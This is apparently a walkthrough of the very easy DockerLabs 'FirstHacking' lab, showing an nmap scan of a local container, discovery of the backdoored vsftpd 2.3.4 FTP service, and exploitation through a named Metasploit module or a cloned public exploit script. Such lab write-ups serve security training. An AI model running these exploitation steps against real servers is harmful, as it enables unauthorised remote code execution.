Keyboard shortcuts

Press or to navigate between chapters

Press S or / to search in the book

Press ? to show this help

Press Esc to hide this help

FirstHacking

machine downloaded from: https://dockerlabs.es/

difficulty: Very Easy

OS: Linux

10 September 2025


  1. First, download the ZIP file, extact it, and start the container using the provided sript:
bash auto_deploy.sh firsthacking.tar
  1. Scanning for open ports and services running nmap
nmap -A -T4 172.17.0.2

The scan shows only one service:

  • FTP service running on port 21
  • Version: vsftpd 2.34
  1. Using searchsploit to check for known exploits:

Results confirm that vsftpd 2.34 contains a backdoor vulnerability that allows remote code execution.

  1. Exploitation with Metasploit using the module exploit/unix/ftp/vsftpd_234_backdoor:
  1. Alternatively, exploitation with python script https://github.com/Hellsender01/vsftpd_2.3.4_Exploit.git
git clone https://github.com/Hellsender01/vsftpd_2.3.4_Exploit.git
cd vsftpd_2.3.4_Exploit
# create venv
python3 -m venv .env
source .env/bin/activate
pip install pwntools
chmod +x exploit.py
python3 exploit.py 172.17.0.2